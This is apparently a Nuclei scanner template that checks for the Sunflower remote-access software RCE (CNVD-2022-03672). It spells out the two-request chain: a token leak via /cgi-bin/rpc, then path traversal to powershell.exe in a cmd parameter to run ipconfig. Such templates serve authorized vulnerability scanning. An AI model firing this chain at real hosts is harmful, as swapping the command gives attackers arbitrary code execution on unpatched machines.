id: CNVD-2022-03672 info: name: Sunflower Simple and Personal - Remote Code Execution author: daffainfo severity: critical description: Sunflower Simple and Personal is susceptible to a remote code execution vulnerability. reference: - https://www.1024sou.com/article/741374.html - https://copyfuture.com/blogs-details/202202192249158884 - https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270 - https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cwe-id: CWE-77 metadata: max-request: 2 tags: cnvd,cnvd2020,sunflower,rce http: - raw: - | POST /cgi-bin/rpc HTTP/1.1 Host: {{Hostname}} action=verify-haras - | GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1 Host: {{Hostname}} Cookie: CID={{cid}} extractors: - type: regex name: cid internal: true group: 1 regex: - '"verify_string":"(.*?)"' req-condition: true matchers: - type: dsl dsl: - "status_code_1==200" - "status_code_2==200" - "contains(body_1, 'verify_string')" - "contains(body_2, 'Windows IP')" condition: and # digest: 4a0a004730450221008c407aa51b36f64812ea3b106ac95b6fb50a0fff06a589a7d275ca99b66e618a02204864e1ecf01c2b486bd77a69c80e34c899346d68811ffd87b880afd043a1079d:922c64590222798bb761d5b6d8e72950